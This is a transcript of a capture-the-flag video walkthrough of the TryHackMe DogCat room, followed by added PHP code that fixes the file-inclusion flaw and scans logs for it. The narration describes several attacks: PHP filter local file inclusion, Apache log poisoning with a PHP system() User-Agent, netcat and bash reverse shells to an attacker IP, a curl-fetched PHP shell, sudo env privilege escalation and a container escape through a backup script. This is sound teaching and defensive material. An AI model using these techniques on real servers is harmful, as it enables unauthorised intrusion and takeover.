TryHackMe! DOGCAT - PHP Filters for Local File Inclusion

Captions
Hello everyone, my name is John Hammond and this is another TryHackMe video. Today I want to be showcasing the DogCat room. It came out just a few days ago, right? I think it was actually like April 17th, and the time of recording is April 22nd, so we'll see how we do. It looks like we have to join this room. I've got it up here on my screen, and I believe this is a free room, so we can access it totally just fine. I'm connected with my John Hammond YouTube account, that is free, and I guess I should clear out some of the stuff from my other video, my bad, trying to knock a few out today, trying to get back to it. So let's make a directory, dogcat, and let's head over there. Let's start a README file so we've got some notes that we can keep track of, and I'll call this dogcat. The IP address I just like to keep track of as a little environment variable, or just a variable that I could use and reuse pretty easily. So let's go ahead and do this. It says: I made a website for viewing cat and dog images with PHP. If you're feeling down, come look at dogs and cats. The machine may take a few minutes to fully start up. Okay, so not a whole lot of answers or guided, I guess, walk-through here; it's more of a challenge room. It says: what's flag one, what's flag two, what's flag three, what's flag four. So we are just off to the races, kind of on our own, so let's do our own thing. Let's go see if this machine is up. I guess I'll ping this guy. Let's export this guy, that, and then let's ping our IP address. Good, is he up and available? He is. Okay, dogcat, a gallery of various doggies there, cats, what would you like to see? I'd like to see a dog, please. Oh, oh, this is wonderful. How many dogs does it have? Oh my gosh, this is the real YouTube content you guys came for. Have we got a cute cat? My girlfriend and I are gonna get a dog, we are. That's a ginormous image. Oh yeah, I don't want that, that's not a dog, that's just white space. We want to get a shell, but you knew. Okay, let's go find out what's really
going on here. If I look at the URL, we've got view=dog, which is kind of peculiar, because maybe we could view some interesting things. The view looks to be a variable which seems to be being set to kind of our option here. If I set it to a dog or a cat, maybe we could view maybe the home page, like index? Only dogs or cats are allowed, that's annoying. cat, dog, those work. What about... I guess I can't, like, you can't do some local file inclusion all the way up to /etc/passwd in this case, because I think it's probably adding a .php extension on here.

So what this is doing, though, if it is adding a PHP extension, what we could abuse are some of the PHP local file inclusion tricks and techniques, where we can say PHP LFI filter, because we could supply a filter for what we might be looking for, and that way we won't have it interpret the actual PHP tags. We could perhaps include any resource that we really, really wanted to and encode it with base64, so that way, when it's encoded in base64, we won't see the real PHP tags being interpreted and evaluated by the server; we'll see them as text that we can go ahead and manipulate and access. So let's just steal this syntax. I always go to this resource, I always have to Google to find it. PayloadsAllTheThings has it just as well, but I always end up looking for the idontplaydarts.com application security site. So let's try to view that syntax for a PHP filter, convert.base64-encode, and I probably should have got the rest of it there, I need to specify a resource, yeah, resource= and then what we want to actually see. So, resource, let's try it for dog, and it looks like we have some base64 encoded, so that would work for us. Let's go ahead and echo that base64 string into our base64 decoder, and it says image source dogs and a random... okay, it looks like there are 10 images and they're all JPEGs. Ah, interesting. Let's see if we could actually access that index.php now. Only cats or dogs are allowed, um, can I, does dog have to be
included in that? How does that work? Maybe if we ask for dog but we also went to a parent directory, so if we were to move up, could we still access index? Oh yeah, okay, so index.php now has all of that. So let's try and echo that into base64 -d. Cool, okay, so now we have the PHP source code. Let's redirect this to an index.php and let's go ahead and subl that so we can see it with real highlighting. view cat or dog, just as we saw, and it has to contain the string dog or cat, return strpos. Oh, it also includes the extension: if the extension is set with a GET variable, oh, we can control that, it will use that, otherwise it will specify .php. Oh, okay, so we could access a lot here, because if we can control the extension and it's not going to add anything else, maybe we could read out anything that we particularly wanted to. Let's try that. We could, oh, it needs to have dog in the string, right, and the extension could be anything, it will include it. So without using our filter, now that we've got the source code of the page, maybe we could include dog, up, up, up, up, up to /etc/passwd, and let's actually use the ampersand to specify ext should be nothing, and there we go, now we've got /etc/passwd. So we could potentially leak out any files that we wanted to, maybe, because we have local file inclusion.

Maybe we could access the log file of this web server and see if it's seeing our requests or what headers are included, because maybe we could actually get our own PHP code executed. We want to elevate what we have from our local file inclusion exploit, or this vulnerability, and leverage it to remote code execution, so we could do some more dangerous stuff, maybe get control of the box. So where would that be? /var/apache/access.log? Nope, okay, that's not it. Is it httpd? Now we have to try and determine where we're actually seeing our logs. Apache log files: /var/log/httpd/access.log, access_log, /var/log... probably need access.log, nope,
apache2? Oh, okay, there we go, /var/log/apache2/access.log. Now we have a lot of results, we can actually see all of our attempts here so far: view dog, etc., etc., etc., and it includes our user agent. My face is in the way, so you can see that here with any of these actual user agents that I'm supplying, is that it is keeping track of the syntax, and if we were to specify our user agent, maybe we'd be able to actually specify our user agent as PHP code that we would want to execute. If we were to load this page, maybe it will actually go ahead and execute that for us. Let's try this. I'm gonna actually do that in curl, I'm gonna have a separate request so I can kind of make that smart for me. I'll go to this page, just getting the URL itself, I will include my user agent as a header for curl with the -H argument, and we're gonna include PHP syntax in here, so it's gonna be wacka-wacka, question mark, php, right, because it's the opening PHP tag, and then we'll run the system command, and we're gonna end up doing this with an argument that can be passed to the web server, so I'll use that HTTP GET variable. The way we can access that is with a PHP variable, but the PHP variable is prefixed with the dollar sign, the same one that bash uses, so if we're using a double quote here we need to go ahead and escape that string with a backslash, so that way it'll be able to say User-Agent equals php system backslash dollar sign, and I'll use GET with the underscore here, and I'll specify c as the name of my string and the argument that I want to use. I'll close the parentheses to the system call, and that, and then I'll close the PHP tags and my double-quoted string. So now, when I go ahead and run this, it should return just the page here, just the index that we were requesting, the home page, but we should have placed this user agent into the Apache access logs that we were able to see with our local file inclusion. So because that can read those PHP tags, it'll execute PHP and
potentially allow us some command execution. So if I go back to my web browser we should be able to see this. I'll go ahead and refresh the page, and looks like we have a lot of requests, okay, peculiar, and system says it cannot execute a blank command. That's good, because we haven't actually supplied that c variable whatsoever. So, you might notice I had to clean up this page, I reset the machine a lot, my IP address is different, because I broke it. Because when I was trying to get the syntax right, PHP would whine, it would get an error, and once you get an error with this kind of avenue, this route that we're taking, this attack vector, is once you bork the access log, if you have a PHP error, it won't return to you whatsoever, and well, now you've completely screwed yourself out of this potential attack vector, because you can't get any more PHP in that code, because every time you try and read this file it's gonna break. So that's the potential danger and risk in doing this technique. But now we finally got it right: system is gonna be able to execute some commands if we were to supply a c value. So I'll try and go ahead and supply, as an HTTP variable, I'll use my ampersand here, c=id, and now we can actually see the output here, we have www-data, www-data, etc., etc., etc. So now we have code execution, we've leveraged our local file inclusion to remote code execution.

So let's see if we can take this technique and go ahead and get a shell. So what I'm gonna do is I'm going to start a little netcat listener, I'll use netcat -lnvp 9999, just quad 9 should work for us, and let me just kind of verify that I can get to it. I'll go ahead and check my IP address, so show tun0, I am 10.8.9.12. I'll just steal that out here and I'll see if I can run that command, 9999, and looks like it didn't go through to me. Do I have the netcat command available? We don't really know, so, other options, we could try using the bash technique, we could try using Python as
our reverse shell. So let's go ahead and go down some of those routes. Let's go to pentestmonkey reverse shell cheat sheet, let's grab a Python one, and just for syntax-wise, let's see if we can actually get output from Python. I'll use python -c, I will do print hello, or just a lot of a's actually, so we'll see if we have that output. Seemingly not. We can try that with python3, still nothing, so no output from them, I guess we don't have that. We could try bash -c echo a, so maybe we'll be able to execute bash. Looks like we can, in that regard, so we could try that bash reverse shell, just to try it, just to see. We might not actually get anywhere with that, but I think it's worth a try, because Python didn't seem to work out for us. So let's go ahead and modify this string, and I do want that IP address, 10.8.9.12, and we're listening on 9999, so let's go grab this string, trying to see if we can actually execute that, maybe not through the browser, but hey, we'll give it a go. Looks like that failed, didn't go to our reverse shell. We could try this with curl, we could try with requests, just to kind of check all of our dots. I'll try that, because, uh, this is kind of new, I haven't particularly done this room just yet, so forgive me for kind of wading in the dark. Let's go ahead and access this page. I don't need all that syntax here, but I do want to go ahead and specify these as arguments. So we just want to get that URL, and we'll say params, because we'll pass these all as GET variables too, with a URL, requests. So view can go ahead and equal that, extension can equal nothing because we're supplying our own extension, and let's just say c can go ahead and equal our shell command. Let's see if that will work for us. So we do need requests to be able to do this in Python, I will import requests, and I'll do r = requests.get on the home page with our params equal to the params. I'll try and run this, seemed like it came through, and no shell. Okay, so I don't have a reverse shell
just yet. What we could try and do is leverage this out to maybe stage our own PHP reverse shell. We could go ahead and simply echo a, and just a test, and make sure we can write and read things. Let's just call a little test file, let's try to run this, and now if I go ahead and access this log file, let's change that command to actually cat out test. Okay, now we have that a variable there, so we could potentially build our own PHP shell with maybe some base64, or repeatedly adding things. So let's try this, let's get a PHP reverse shell. I think I still have mine, I think I still have a copy, /opt, php-reverse-shell, yep. Let's just call this a shell.php in our current directory. So let's modify this so we have our own IP address, 10.8.9.112, is that right? I think that's me, I hate when I repeatedly forget these, but it happens to me all the time. 112, and let's go to port 9999. So let's go through every single line in here, let's actually clear these comments out because I don't care about them all that much, and let's actually echo each of these and start to build them into our script. So let's build it out onto the filesystem, and I'll show you what I mean. Let's go and kind of modify and make these go away so we can verify we can read our own shell. So let's do with open shell.php as a handle, let's do handle.readlines, and let's just grab base64 in here so we can go ahead and base64 encode some of these things. Let's say lines can equal readlines, and let's actually strip out all the new lines, so x.strip() for x in our handle.readlines(), and now let's actually base64 encode these. So let's do that just in the while loop, so we can go ahead and print the lines that we have, all as an array. b'x', is that... oh, sorry, yep, I don't need that b in there. Looks like we have all of our lines as an array, or a list, so that's good. Let's try to change this so that we can base64 encode each
of these, and now they're all base64 lines, so that works well for us. So now what we can do is we can actually make these arguments real for us, and for line in all these base64-encoded lines, let's specify the parameters can actually equal echo the line, and so I'll use a percent here, actually I'll just use format, because I think Python 2 has that format, right? Sublime Text is set up with Python 2 right now, so I know you'll hate me for using Python 2, but that's just where we are. base64 line into, and let's add it into revshell.php, and let's include that. So we do that repeatedly, repeatedly, repeatedly, so we could build our shell, and then after that's built, let's go ahead and, we should verify what directory we're in before we go through with this. Okay, we are in /var/www/html, so when we create a file with the PHP extension in the current directory it will go ahead and add it and make it publicly accessible for us, so we can reach our reverse shell and pull that back. So now, after that, let's go ahead and base64 -d revshell.php, because that's the file name that we've created, and let's redirect that to shell.php. So now we are adding every single line into a revshell.php file that will originally be base64 decoded, then we'll go ahead and base64 decode that shell, so we have a shell.php which is the raw PHP file. If we go ahead and request that, eventually we should be able to go ahead and see, okay, if we echo or ls that shell.php it should exist for us, just by simply running our script, and we'll have our reverse shell. Let's try it. Sending a ton of requests to the web server, building out our revshell.php file, renaming that, or at least base64 decoding it, so eventually we do have shell.php. None of these, are they being executed? Yes they are, because we're requesting that page. Just trying to think in my head, like, is this a valid technique, will this work for us to get our reverse shell? Taking a little bit of time, I don't know how long it'll
take, so we'll pause. Okay, finished in just under an hour. So if we go back to our page, let's ls shell.php, which does seem to exist. If we were to verify that our netcat is still running, what we could do is we could go to shell.php, and: call to undefined function in PHP, set_time_limit, on that guy. So our set_time_limit must not have worked. Are we missing a newline there? Maybe that's the immediate function that is failing. So I guess that doesn't work well for us. If I echo nothing to base64 decode, does it work? Yeah, okay, maybe we could change this up and base64 decode it as we're developing the script. So let's rm revshell, go back to our command to remove revshell.php. Well, if I ls, okay, I have shell.php, which we know is broken, and a revshell, which we'll need to add. So let's go ahead and build this all out, base64 decoding that output and adding it in as needed. It's a wait again. Okay, another one, that took just a minute. Our revshell should be created, so we should have revshell.php, there it is. Let's verify that revshell, let's just cat it out, and that is also removing our whitespace. Why does it do that? That's not adding a new line. We could try to echo an empty line into revshell.php, let's try that. Okay, now that we've added a new line, let's go see if we can actually see that in our revshell.php. Seemingly no new lines. Let's try and run it regardless, let's go to revshell.php, and that's loading and failing on line 95. Okay, okay, let's try another avenue. Do we have wget? wget -h? No. curl? curl -h? Oh, looks like we have curl, okay, maybe that will work. Let's spin up a server, python -m http.server, good, and then let's go ahead and rm shell.php if we still have it, and let's download our, curl, what is curl to download to a file? I think it's just -o. -o, yep, okay. So curl http://10.8.9.112:8000/shell.php, and let's redirect that to, or output it, sorry, with -o shell.php. So, looks like, okay, retrieved it, and now we should have a
shell.php that we should be able to access. That looks like it connected, okay, excellent, finally we have a shell. Let me stabilize this shell. Do we have python -c? I don't know why, it shows ls to work. We don't have Python, maybe python3? python3 is also not found, okay, so I guess we don't particularly need to stabilize the shell, I guess we'll be working... clearly. export TERM=xterm, now if I clear, okay, it's good. Let's see what we got. Now we're moving around the filesystem, we were in /var/www/html, and when I saw the output earlier I saw a flag.php, so let's just cat that out. Okay, there's our first flag, we can go ahead and submit that, and now let's go navigate around the filesystem. Do we have netcat? We don't have netcat, huh. Well, let's just cat flag 2, that has that strange name, so let's cat that out. Hello, flag 2, RCE, yes, thank you, we did that eventually, I don't know why we... What's flag 3? So let's try to privesc. We don't have netcat, we know we have curl, so we could download a little LinPEAS. Let's move or copy /opt/linpeas into this directory, and let's move into /dev/shm. Can I run bash? That was a stupid idea. Oh, I am in /dev/shm, so I'm just fine, I guess now I just no longer have a prompt because I ran bash, stupid me. If I exit bash, okay, good, I'm back in my thing. Now that we have /dev/shm and we've got LinPEAS over in our web server, let's go ahead and curl that, so http://10.8.9.112:8000, and it's linpeas.sh, so I'll save that as linpeas.sh. Taking its sweet time, looks like it's got it, so let's mark that as executable and now let's run linpeas.sh, and we'll tee that to lin.log just so we have a log copy of it. And I cannot... why can I not execute that? I made it executable, that's weird to me. cat linpeas, is that not all of it? Okay, I guess we'll do some manual enumeration. What can I run as sudo? Ah, env, what does that let me do? Oh, it just displays everything. Can I GTFOBins that? GTFOBins GitHub, env, oh, you just pass it as an argument, so let's go,
okay, let's sudo that again and let's /bin/bash to get regular bash, and now I'm root. I probably didn't need to do root or bash, so I would not have a shell. Let's just do /bin/sh so I have my prompt back, or I just don't have my prompt whatsoever, that's totally fine. Let's go check out the root directory, and there is flag three, so let's cat that out. Different environments, what is that referring to? Is this... let's take a look. We are in a Docker environment, okay, so what, it's a different environment. I was kind of curious, did it put us in a Docker container? And I guess we are in a Docker container, so that doesn't particularly help. I guess we can look around and see what else might be odd without using LinPEAS, maybe LinEnum would work, or whatever the case may be. Oh, opt has something called backups now, there's backup.sh, backup.tar. Do we have that as a crontab -l? Oh, we're in a Docker container, so it probably can't see that. tar xzvf backup.tar, oh okay, so it's tarring the entire container, oh, and it is checking out that backup script, so it might be running that, might be doing that. What is backup.sh? cat backup.sh. Looks like it is tarring something from outside of the container, okay, awesome, and that container must be mounted to kind of share that we're in. So what we could do is add some other netcat reverse shell syntax, or maybe bash, or whichever one might work. Let's try with netcat, let's get this guy to see if we can break out of this container. Let me nc -lnvp 8888 and let's modify this to now bring me to 10.8.9.112, quad eight, and maybe, if that is actually being run, we could get some stuff. There's no super special characters in there, so let's add that to backup.sh. Okay, what is that, root? Oh no, that's a directory that was just made when I untarred it. So how does backup.sh look right now? Now it tars everything and has a netcat command to call back to me. That better be the right IP address. It
is. Okay, so I guess I'll wait a few minutes and see if I get a shell back, kind of driving blind here. We could try the bash technique as well, like if that command fails, then... oh, oh, oh, oh, it worked. Okay, so now we're in the real file system and we have the flag text file, nice, nice, okay, cool. Wow, that took more than it needed to to get that done, but okay, that was DogCat, so finally did it, right?

So a little bit of recap, right: we found the web page that was seemingly doing some file inclusion to be able to read a dog or a cat, and we can abuse that. It was limiting our file extension, that we didn't know admittedly at first, but once we found that, okay, we could do some local file inclusion with the PHP filter technique, that way we could read the source code of the pages, and we could see that we could specify a file extension. If we didn't use the file extension and we left it empty, so we could supply our own in the file name, then we would have any actual, like, local file inclusion that we wanted to, not just strictly limited to PHP files, so we could pull up /etc/passwd, so we could see the access log for Apache and the web server, and that was the goldmine, because then we were able to actually inject some PHP code in and get remote code execution, because PHP will execute, and it's server-side, so PHP would allow us to put some commands in and run our own commands. And we tried some techniques, I was bumping around trying to, okay, pull in a reverse shell, maybe echo one with stupid echo base64 techniques, and then eventually we just curled one down, and was able to pull one down from a web site that we hosted, so that was kind of neat. And then, now that we had the reverse shell, we tried to pull some other things in to get LinPEAS, some manual enumeration working, or automated enumeration working, and that didn't work, so we opted for our manual enumeration. We could see that the www-data user, or the user that we were running currently, was able to run the env command, or the
environment command, as root with sudo, so we were able to use GTFOBins to see that, as a premise, we could just simply fire up a root shell and we could escalate. Problem is, we were still trapped inside of a Docker container, so we saw, we found, we discovered that backups directory that was pulling some information in and out and running it manually on the host, and that was fantastic, because that gave us a route to get out of the Docker container and actually get command execution on the real machine, on the host itself, and that is what that backups.sh allowed us to do. Eventually it called back, maybe that's running with a cron job or some scheduled tasks, but with that we could find the fourth flag, and we had root on the actual computer itself. So, holy crap, long video, a lot of mistakes, a lot of learning. I hope you guys enjoyed this video. If you did, like button, comment button, subscribe button, you know the drill. Thank you guys, thank you so much for watching, I'll see you in the next one, take care.
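The root cause the video reads out of index.php (a substring check for "dog"/"cat", an attacker-controlled ext parameter that defaults to ".php", and the result handed straight to include) is easiest to see beside a fixed version. The following is an added example, not the room's real index.php and not code from the video: the vulnerable logic is reconstructed from the description above, and the hardened function, the helper names, the temp directory and the sample requests are all my assumptions. Both functions return the path they would include instead of calling include(), so the file runs from the CLI as a side-by-side comparison.

```php
<?php
// Added example, not the room's source: a reconstruction of the view handler
// the video describes, next to a hardened version. Both return the path that
// would be passed to include() instead of including it, so the script can be
// run from the CLI and the two behaviours compared.

/**
 * Vulnerable: the logic described in the video. "view" only has to contain
 * the substring "dog" or "cat", and the extension appended to it comes from
 * the "ext" parameter whenever that parameter is present (default ".php").
 */
function vulnerable_view_path(array $get): ?string
{
    if (!isset($get['view'])) {
        return null;
    }
    $view = $get['view'];
    if (strpos($view, 'dog') === false && strpos($view, 'cat') === false) {
        return null; // "Only cats or dogs are allowed"
    }
    $ext = isset($get['ext']) ? $get['ext'] : '.php';
    return $view . $ext; // goes straight to include() in the real page
}

/**
 * Hardened: exact-match allowlist, fixed extension, and the resolved path is
 * checked to still live inside $viewsDir. Stream wrappers (php://filter) and
 * ".." segments never reach include() because the request value is only ever
 * compared against the allowlist, never used as a path fragment.
 */
function hardened_view_path(array $get, string $viewsDir): ?string
{
    $allowed = ['dog', 'cat'];
    $view = $get['view'] ?? 'dog';
    if (!in_array($view, $allowed, true)) {
        return null;
    }
    $real = realpath($viewsDir . '/' . $view . '.php');
    $base = realpath($viewsDir);
    if ($real === false || $base === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// --- demo ---------------------------------------------------------------
// Constructed view files in a temp directory so realpath() has something to resolve.
$viewsDir = sys_get_temp_dir() . '/dogcat_views_demo';
@mkdir($viewsDir);
foreach (['dog', 'cat'] as $name) {
    file_put_contents("$viewsDir/$name.php", "<?php // $name view\n");
}

// Constructed requests: one normal request, then the two request shapes the
// video uses (traversal with an emptied ext, and the php://filter wrapper).
$requests = [
    'normal'    => ['view' => 'dog'],
    'traversal' => ['view' => 'dog/../../../../etc/passwd', 'ext' => ''],
    'filter'    => ['view' => 'php://filter/convert.base64-encode/resource=dog'],
];
foreach ($requests as $label => $get) {
    printf("%-9s vulnerable => %s\n", $label, var_export(vulnerable_view_path($get), true));
    printf("%-9s hardened   => %s\n", $label, var_export(hardened_view_path($get, $viewsDir), true));
}
```

Run with `php` on the command line: the vulnerable function returns `dog/../../../../etc/passwd` and the `php://filter/...` string unchanged (both would be included), while the hardened one returns NULL for both and a real path only for `dog`. The allowlist is the actual fix; the realpath prefix check is belt and braces in case someone later turns the allowlist back into a string operation.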
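Every step in the video also leaves a trace in the same Apache access log it abuses, which is what a defender wants to pick up. The following is an added example, not from the video: a small scanner over Apache "combined"-format log lines that flags php:// wrappers and "../" traversal in the query string, an ext parameter emptied to drop the forced ".php" suffix, and PHP tags in the User-Agent (the log-poisoning payload). The log lines are constructed for the demo and the function names are my own.

```php
<?php
// Added example, not from the video: scan Apache "combined" access log lines
// for the traces that the LFI and log-poisoning steps leave behind.

function parse_combined_line(string $line): ?array
{
    // host ident user [time] "method path proto" status bytes "referer" "user-agent"
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

function lfi_indicators(array $entry): array
{
    $hits = [];
    $qpos = strpos($entry['path'], '?');
    // Decode before matching so %2e%2e%2f and friends are seen as "../".
    $query = $qpos === false ? '' : rawurldecode(substr($entry['path'], $qpos + 1));
    parse_str($query, $params);

    if (stripos($query, 'php://') !== false) {
        $hits[] = 'php-wrapper';
    }
    if (strpos($query, '../') !== false || strpos($query, '..\\') !== false) {
        $hits[] = 'traversal';
    }
    if (array_key_exists('ext', $params) && $params['ext'] === '') {
        $hits[] = 'empty-ext';
    }
    if (preg_match('/<\?(php|=)/i', $entry['ua'])) {
        $hits[] = 'php-tag-in-user-agent';
    }
    return $hits;
}

function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        $entry = parse_combined_line($line);
        if ($entry === null) {
            continue; // not a combined-format line; skip rather than guess
        }
        $hits = lfi_indicators($entry);
        if ($hits !== []) {
            $findings[] = ['line' => $i + 1, 'ip' => $entry['ip'], 'path' => $entry['path'], 'indicators' => $hits];
        }
    }
    return $findings;
}

// Constructed sample log: one benign request followed by the three request
// shapes the video walks through (filter wrapper, traversal with empty ext,
// PHP tag in the User-Agent).
$sampleLog = [
    '10.8.9.12 - - [22/Apr/2020:14:01:02 +0000] "GET /?view=dog HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.8.9.12 - - [22/Apr/2020:14:01:10 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.8.9.12 - - [22/Apr/2020:14:02:31 +0000] "GET /?view=dog/../../../../etc/passwd&ext= HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
    '10.8.9.12 - - [22/Apr/2020:14:03:05 +0000] "GET /?view=dog HTTP/1.1" 200 1234 "-" "<?php system($_GET[\'c\']); ?>"',
];

foreach (scan_log($sampleLog) as $f) {
    printf("line %d %s %s -> %s\n", $f['line'], $f['ip'], $f['path'], implode(',', $f['indicators']));
}
```

Run with `php`, lines 2, 3 and 4 are reported (php-wrapper; traversal,empty-ext; php-tag-in-user-agent) and line 1 is not. The User-Agent check is the highest-confidence one: as the video notes, the poisoned line stays in access.log, so it is a durable indicator even after the attacker moves on, and a PHP tag has no business in a browser identifier. The query checks match on the decoded query so percent-encoded traversal is not missed, at the cost of occasional false positives on legitimate URLs that contain "php://" or ".." in parameter values.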
Info
Channel: John Hammond
Views: 72,980
Id: u_uuk7FWWF4
Length: 32min 4sec (1924 seconds)
Published: Thu Apr 30 2020